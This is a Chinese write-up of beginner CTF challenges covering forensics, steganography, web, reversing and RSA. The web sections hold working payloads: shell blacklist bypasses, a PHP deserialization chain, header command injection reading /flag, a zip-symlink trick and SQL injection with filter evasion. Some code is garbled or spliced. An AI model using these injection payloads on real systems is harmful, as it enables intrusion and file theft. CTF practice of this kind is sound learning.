<p>这次beginctf新生赛一边问gpt一边做,最后勉强捡了个第八名<br><img src="https://nc0.cdn.zkaq.cn/md/19233/f346dee96fe363459e05cb175958b19e_16639.png" alt=""><br>以下是部分题解</p>
<h2><a name="Forensics"></a><span></span>Forensics</h2><h4><a name="学取证咯 - cmd"></a><span></span>学取证咯 - cmd</h4><p>volatility imageinfo查看操作系统</p>
<p>volatility —profile=Win7SP1x64 -f 学取证咯.raw cmdscan</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/19233/15afdc45499d310e1da2c165d1910e01_81210.png" alt=""></p>
<h4><a name="学取证咯 - 想登录我的计算机吗?"></a><span></span>学取证咯 - 想登录我的计算机吗?</h4><p>看得是这篇文章来安装mimikatz插件：<br><a href="https://blog.csdn.net/sbingmo/article/details/125719145?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-125719145-blog-132649855.235装完后直接执行">https://blog.csdn.net/sbingmo/article/details/125719145?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-125719145-blog-132649855.235装完后直接执行</a></p>
<pre><code>python2 vol.py -f study.raw --profile=Win7SP1x64  mimikatz
</code></pre>
<p><img src="https://nc0.cdn.zkaq.cn/md/19233/206c55803d8ff50739a267e9057b9c1a_53374.png" alt=""></p>
<h4><a name="学取证咯 - 还记得ie吗?"></a><span></span>学取证咯 - 还记得ie吗?</h4><h4><a name="学取证咯 - 计算机的姓名?"></a><span></span>学取证咯 - 计算机的姓名?</h4><pre><code>volatility -f  hivelist
#查找名为System的Hive（通常位于地址0xfffff8a000008000）和名为Software的Hive（通常位于地址0xfffff8a00001a000）。
volatility -f  --profile= printkey -o 0xfffff8a000008000 -K ControlSet001\Control\ComputerName\ComputerName
#查找计算机名(注册表)
</code></pre>
<p><img src="https://nc0.cdn.zkaq.cn/md/19233/ee5e849041f19b858c79f17ab81c84ea_94262.png" alt=""></p>
<h2><a name="MISC"></a><span></span>MISC</h2><h4><a name="下一站上岸"></a><span></span>下一站上岸</h4><p>开局拿到题<br><img src="https://nc0.cdn.zkaq.cn/md/19233/12e4a071d018fe785747137e7bf27291_11067.png" alt=""><br>然后用zsteg看看有没有隐写<br><img src="https://nc0.cdn.zkaq.cn/md/19233/9f94e9334e01b59b9d09871b0d89f891_14544.png" alt=""><br>base64解密<br><img src="https://nc0.cdn.zkaq.cn/md/19233/6a929f3c03cf08b0018018b6a070bc9a_64219.png" alt=""><br>然后看看图片：发现交点个数只有0，1，2三中情况，0代表分割符,1是.二是_<br>这组成了莫斯电码，对着表拼出flag即可</p>
<h4><a name="tupper"></a><span></span>tupper</h4><p>开局给了好多文件，写个脚本合并一下</p>
<pre><code>import base64
i=0
result=&quot;&quot;
while(i 0.5 else 0
    for y in range(17):
        for x in range(106):
            aa[y, x] = f(x, y) 
    return aa[:,::-1]

k = 14278193432728026049298574575557534321062349352543562656766469704092874688354679371212444382298821342093450398907096976002458807598535735172126657504131171684907173086659505143920300085808809647256790384378553780282894239751898620041143383317064727136903634770936398518547900512548419486364915399253941245911205262493591158497708219126453587456637302888701303382210748629800081821684283187368543601559778431735006794761542413006621219207322808449232050578852431361678745355776921132352419931907838205001184 #输入你要提取的k
aa = Tupper_self_referential_formula(k)
plt.figure(figsize=(15,10))
plt.imshow(aa,origin=&#39;lower&#39;)
plt.savefig(&quot;tupper.png&quot;)
img = Image.open(&#39;tupper.png&#39;)
#翻转
dst1 = img.transpose(Image.FLIP_LEFT_RIGHT).rotate(360)   
plt.imshow(dst1)
plt.show()
</code></pre>
<p>结果：<img src="https://nc0.cdn.zkaq.cn/md/19233/37c840e516a9e2b2293a89dd83e966e3_67039.png" alt=""></p>
<h4><a name="real check in"></a><span></span>real check in</h4><p>MJSWO2LOPNLUKTCDJ5GWKX3UN5PUEM2HNFXEGVCGL4ZDAMRUL5EDAUDFL5MU6VK7O5UUYMK7GEYWWZK7NE3X2===<br>base32秒了</p>
<h4><a name="where is crazyman v1.0"></a><span></span>where is crazyman v1.0</h4><p>看题<br><img src="https://nc0.cdn.zkaq.cn/md/19233/2ac26aec6634358282764cd32c7c6904_72846.png" alt=""><br>google搜图一下<br><img src="https://nc0.cdn.zkaq.cn/md/19233/db505747d3c9827570b51aa6186fc955_52840.png" alt=""><br>秋叶原秒了</p>
<h4><a name="where is crazyman v2.0"></a><span></span>where is crazyman v2.0</h4><p>先看图<img src="https://nc0.cdn.zkaq.cn/md/19233/65a7dc7063ebb56a7308fc57312373fe_84478.png" alt=""><br>上google<br><img src="https://nc0.cdn.zkaq.cn/md/19233/d23e7795620d0b3c1f86af43bc456ab2_57993.png" alt=""><br>这张最像<br>打开地图看看利雅得城市。这里有水，找到了<br><img src="https://nc0.cdn.zkaq.cn/md/19233/4b468bccb64ae4c547a09f6d133a0a7a_69875.png" alt=""></p>
<h2><a name="WEB"></a><span></span>WEB</h2><h4><a name="readbooks"></a><span></span>readbooks</h4><p>开局一个莫名其妙的界面<br><img src="https://nc0.cdn.zkaq.cn/md/19233/8cf08a29d8ab89d28cc9488aafd534f4_44199.png" alt=""><br>但是试着目录爆破，banned了，感觉很奇怪<br><img src="https://nc0.cdn.zkaq.cn/md/19233/26c782aaeb213c56743ad7649766b202_90830.png" alt=""><br>发现public/其实是指cat 。这样一来为啥加过滤说的通了<br>同样的/private/list/就是ls 了<br>就先用ls确定源码<br><img src="https://nc0.cdn.zkaq.cn/md/19233/b59388668c57be5b53089eca2ff3abbc_65499.png" alt=""><br><code>/public/app*</code>得到源码</p>
<pre><code>import os
from flask import Flask, request, render_template

app = Flask(__name__)

DISALLOWED1 = [&#39;?&#39;, &#39;../&#39;, &#39;/&#39;, &#39;;&#39;, &#39;!&#39;, &#39;&lt;span class=&quot;label label-primary&quot;&gt;@&#39;,&lt;/span&gt; &#39;#&#39;, &#39;^&#39;, &#39;&amp;amp;&#39;, &#39;(&#39;, &#39;)&#39;, &#39;=&#39;, &#39;+&#39;]
DISALLOWED_FILES = [&#39;app.py&#39;, &#39;templates&#39;, &#39;etc&#39;, &#39;flag&#39;, &#39;blacklist&#39;]
BLACKLIST = [x[:-1] for x in open(&quot;./blacklist.txt&quot;).readlines()][:-1]

BLACKLIST.append(&quot;/&quot;)
BLACKLIST.append(&quot;\\&quot;)
BLACKLIST.append(&quot; &quot;)
BLACKLIST.append(&quot;\t&quot;)
BLACKLIST.append(&quot;\n&quot;)
BLACKLIST.append(&quot;tc&quot;)

ALLOW = [
    &quot;{&quot;,
    &quot;}&quot;,
    &quot;[&quot;,
    &quot;pwd&quot;,
    &quot;-&quot;,
    &quot;_&quot;
]

for a in ALLOW:
    try:
        BLACKLIST.remove(a)
    except ValueError:
        pass

&lt;span class=&quot;label label-primary&quot;&gt;@app.route(&#39;/&#39;)#CTL{n}&lt;/span&gt;&lt;span class=&quot;label label-primary&quot;&gt;@app.route(&#39;/index&#39;)#CTL{n}def&lt;/span&gt; hello_world():
    return render_template(&#39;index.html&#39;)

&lt;span class=&quot;label label-primary&quot;&gt;@app.route(&#39;/public/&#39;)#CTL{n}def&lt;/span&gt; readbook(name):
    name = str(name)
    for i in DISALLOWED1:
        if i in name:
            return &quot;banned!&quot;
    for j in DISALLOWED_FILES:
        if j in name:
            return &quot;banned!&quot;
    for k in BLACKLIST:
        if k in name:
            return &quot;banned!&quot;
    print(name)
    try:
        res = os.popen(&#39;cat {}&#39;.format(name)).read()
        return res
    except:
        return &quot;error&quot;

&lt;span class=&quot;label label-primary&quot;&gt;@app.route(&#39;/list/&#39;)#CTL{n}def&lt;/span&gt; listbook(name):
    name = str(name)
    for i in DISALLOWED1:
        if i in name:
            return &quot;banned!&quot;
    for j in DISALLOWED_FILES:
        if j in name:
            return &quot;banned!&quot;
    for k in BLACKLIST:
        if k in name:
            return &quot;banned!&quot;
    print(name)
    cmd = &#39;ls {}&#39;.format(name)
    try:
        res = os.popen(cmd).read()
        return res
    except:
        return &quot;error&quot;

if __name__ == &#39;__main__&#39;:
    app.run(host=&#39;0.0.0.0&#39;,port=8878)
</code></pre>
<p>那就是想办法绕过blacklist，执行cat \/f*<br>关键点就是构造\/</p>
<pre><code>pwd|cut${IFS}-b${IFS}1&amp;gt;aba #获取斜杠
c&#39;&#39;at${IFS}`c&#39;&#39;at${IFS}aba`f*#cat /f*
</code></pre>
<p>出了</p>
<h4><a name="POPGadget"></a><span></span>POPGadget</h4><pre><code>&lt;?php


class Fun{
    private $func = &#39;call_user_func_array&#39;;
    public function __call($f,$p){
        call_user_func($this-&gt;func,$f,$p);
    }
}
class Test{
    public function __call($f,$p){
        echo getenv(&quot;FLAG&quot;);
    }
    public function __wakeup(){
        echo &quot;serialize me?&quot;;
    }
}
class A {
    public $a;
    public function __get($p){
        if(preg_match(&quot;/Test/&quot;,get_class($this-&amp;gt;a))){
            return &quot;No test in Prod\n&quot;;
        }
        return $this-&amp;gt;a-&amp;gt;$p();
    }
}
class B {
    public $p;
    public function __destruct(){
        $p = $this-&amp;gt;p;
        echo $this-&amp;gt;a-&amp;gt;$p;
    }
}
$a = new A();
$a-&amp;gt;a = new Fun();
$b = new B();
$b-&amp;gt;a = $a;
$b-&amp;gt;p = &#39;phpinfo&#39;;
echo serialize($b);
</code></pre>
<p>flag在env里，phpinfo中有</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/19233/be99eabf42e0ab29464506bf6d7b163e_79019.png" alt=""><br>链子Fun::__call()  ‘ok’,<br>                    ‘message’ =&gt; ‘File uploaded successfully’,<br>                    ‘url’ =&gt; preg_split(‘/\?/‘, $_SERVER[‘HTTP_REFERER’])[0] . $file_destination<br>                ));<br>            }<br>        }<br>    } else {<br>        echo json_encode(array(<br>            ‘status’ =&gt; ‘error’,<br>            ‘message’ =&gt; ‘Only zip files are allowed’<br>        ));<br>    }<br>}</p>
<pre><code>
payload:

```http
POST / HTTP/1.1
Host: 101.32.220.189:31388
Content-Length: 1183
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqAJwILUAyHBAxa86
Accept: */*
X-EXTRACT-TO: uploads/;cat /flag&amp;gt;./uploads/aba
Origin: http://101.32.220.189:31388
Referer: http://101.32.220.189:31388/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryqAJwILUAyHBAxa86
Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;1.zip&quot;
Content-Type: application/x-zip-compressed

PK
</code></pre><h4><a name="zupload-pro-plus-max-ultra-premium"></a><span></span>zupload-pro-plus-max-ultra-premium</h4><p>软连接:</p>
<pre><code>ln -s /flag getflag
zip --symlinks exp.zip getflag
</code></pre>
<p>传上exp.zip后访问/uploads/getflag</p>
<h4><a name="sql教学局"></a><span></span>sql教学局</h4><p>打了一下发现过滤了空格(/**/)，or,select,from等关键字(双写绕过)<br>第一关：<br><img src="https://nc0.cdn.zkaq.cn/md/19233/a5778ae9d1814427646509d6a5d40da7_33479.png" alt=""></p>
<pre><code>user=1&#39;/**/union/**/selselectect/**/flag/**/frfromom/**/secret.passwoorrd%23#
</code></pre>
<p>题目：第二段flag位于 当前数据库score表，学生begin的成绩(grade)</p>
<pre><code>user=1&#39;/**/union/**/selselectect/**/grade/**/frfromom/**/scoorre/**/where/**/student/**/like/**/&#39;begin&#39;%23#
</code></pre>
<p>第三题:loadfile就行了</p>
<pre><code>1&#39;/**/union/**/selselectect/**/loloadad_file(&#39;/flag&#39;)%23
</code></pre>
<h2><a name="RE"></a><span></span>RE</h2><h4><a name="stick game"></a><span></span>stick game</h4><p>拿到源码后先格式化，然后搜搜score变量:</p>
<p>发现了个可疑的操作:<img src="https://nc0.cdn.zkaq.cn/md/19233/fee0ba37d6ef555dd6cb8a9282061d07_73714.png" alt=""></p>
<p>然后搜搜这个_0xa10726</p>
<p>找到了一个类似加分的操作，手动加上1337426</p>
<p><img src="https://nc0.cdn.zkaq.cn/md/19233/7aa2f9d3c4005feff40dda97e87e5dc5_99040.png" alt=""></p>
<p>打开游戏玩：每次就会加上1337426分就出了<img src="https://nc0.cdn.zkaq.cn/md/19233/d82f547ca73f8497f592d963f7daf8a3_26837.png" alt=""></p>
<h4><a name="real checkin xor"></a><span></span>real checkin xor</h4><pre><code>def verify_func(ciper,key):
    encrypted = []
    for i in range(len(ciper)):
        encrypted.append(ord(ciper[i])^ord(key[i%len(key)]))
    return encrypted

secret = [7, 31, 56, 25, 23, 15, 91, 21, 49, 15, 33, 88, 26, 48, 60, 58, 4, 86, 36, 64, 23, 54, 63, 0, 54, 22, 6, 55, 59, 38, 108, 39, 45, 23, 102, 27, 11, 56, 32, 0, 82, 24]
print(&quot;这是一个保险箱,你能输入相关的key来进行解密吗?&quot;)
input_line = input(&quot;请输入key &amp;gt; &quot;)
if verify_func(input_line,&quot;ez_python_xor_reverse&quot;) == secret:
    print(&quot;密码正确&quot;)
else:
    print(&quot;密码错误&quot;)
</code></pre>
<p>改改</p>
<pre><code>def verify_func(ciper,key):
    encrypted = []
    for i in range(len(ciper)):
        encrypted.append(ord(ciper[i])^ord(key[i%len(key)]))
    return encrypted
def decrypt_func(ciper,key):
    decrypted = []
    for i in range(len(ciper)):
        decrypted.append(chr(ciper[i]^ord(key[i%len(key)])))
    return decrypted

secret = [7, 31, 56, 25, 23, 15, 91, 21, 49, 15, 33, 88, 26, 48, 60, 58, 4, 86, 36, 64, 23, 54, 63, 0, 54, 22, 6, 55, 59, 38, 108, 39, 45, 23, 102, 27, 11, 56, 32, 0, 82, 24]
for  i in  decrypt_func(secret,&quot;ez_python_xor_reverse&quot;):
    print(i,end=&quot;&quot;)
&#39;&#39;&#39;
print(&quot;这是一个保险箱,你能输入相关的key来进行解密吗?&quot;)
input_line = input(&quot;请输入key &amp;gt; &quot;)
if verify_func(input_line,&quot;ez_python_xor_reverse&quot;) == secret:
    print(&quot;密码正确&quot;)
else:
    print(&quot;密码错误&quot;)

&#39;&#39;&#39;
</code></pre>
<p>直接用出了</p>
<h4><a name="红白机"></a><span></span>红白机</h4><p>上网搜发现这是一种汇编语言(6502)<br>并且发现了个在线执行网站：<a href="https://codediy.github.io/nes-zh/easy6502/index.html">https://codediy.github.io/nes-zh/easy6502/index.html</a></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/19233/263fea1fd53b5d15d729f7bbab7da5a6_34072.png" alt=""><br>出了</p>
<h2><a name="Crypto"></a><span></span>Crypto</h2><h4><a name="fake_n"></a><span></span>fake_n</h4><p>先分析代码：</p>
<pre><code>from Crypto.Util.number import *
from secret import flag

def fakeN_list():
    puzzle_list = []

    for i in range(15):
        r = getPrime(32)
        puzzle_list.append(r)

    p = getPrime(32)
    q = getPrime(32)
    com = p*q

    puzzle_list.append(com)

    return puzzle_list

def encrypt(m,e,fake_n_list):
    fake_n = 1
    for i in range(len(fake_n_list)):
        fake_n *= fake_n_list[i]

    really_n = 1
    for i in range(len(fake_n_list)-1):
        really_n *= fake_n_list[i]

    c = pow(m,e,really_n)

    print(&quot;c =&quot;,c)
    print(&quot;fake_n =&quot;,fake_n)

if __name__ == &#39;__main__&#39;:
    m = bytes_to_long(flag)
    e = 65537
    fake_n_list = fakeN_list()
    encrypt(m,e,fake_n_list)

&#39;&#39;&#39;
c = 6451324417011540096371899193595274967584961629958072589442231753539333785715373417620914700292158431998640787575661170945478654203892533418902
fake_n = 178981104694777551556050210788105224912858808489844293395656882292972328450647023459180992923023126555636398409062602947287270007964052060975137318172446309766581
&#39;&#39;&#39;
</code></pre>
<p>可以知道real和fake的区别就是比fake少了个因数，这里先利用得到所有的因数<br><img src="https://nc0.cdn.zkaq.cn/md/19233/7319401b698acd25c1bf9d0acfd2294d_72756.png" alt=""><br>根据phi是由fake_n来的就改了改网上的脚本写了个爆破的脚本</p>
<pre><code>import gmpy2
import math
from Crypto.Util.number import *

c = 6451324417011540096371899193595274967584961629958072589442231753539333785715373417620914700292158431998640787575661170945478654203892533418902
fake_n = 178981104694777551556050210788105224912858808489844293395656882292972328450647023459180992923023126555636398409062602947287270007964052060975137318172446309766581
n_list=[2215221821, 2290486867, 2333428577, 2361589081, 2446301969, 2507934301, 2590663067, 3107210929, 3278987191, 3389689241, 3417707929, 3429664037, 3716624207, 3859354699, 3965529989, 4098704749, 4267348123]
fake_phi=1
e = 65537
for i in n_list:
    fake_phi*=(i-1)
for i in n_list:
    for j in n_list:
        if i==j:continue
        n=fake_n//i//j
        phi=fake_phi//i-1//j-1
        d=gmpy2.invert(e,phi)
        m = pow(c,d,n)
        if(b&#39;begin&#39; in long_to_bytes(m)):
            print(long_to_bytes(m))
</code></pre>
<p><img src="https://nc0.cdn.zkaq.cn/md/19233/2634b710881e460879588617b2a99257_85177.png" alt=""></p>
| 用户名 | 金币 | 积分 | 时间 | 理由 |
| Track-魔方 |
200.00 |
0 |
2024-02-07 11:11:50 |
普适 100 可读 100 |
Track-魔方
发表于 2024-2-6
评论列表
加载数据中...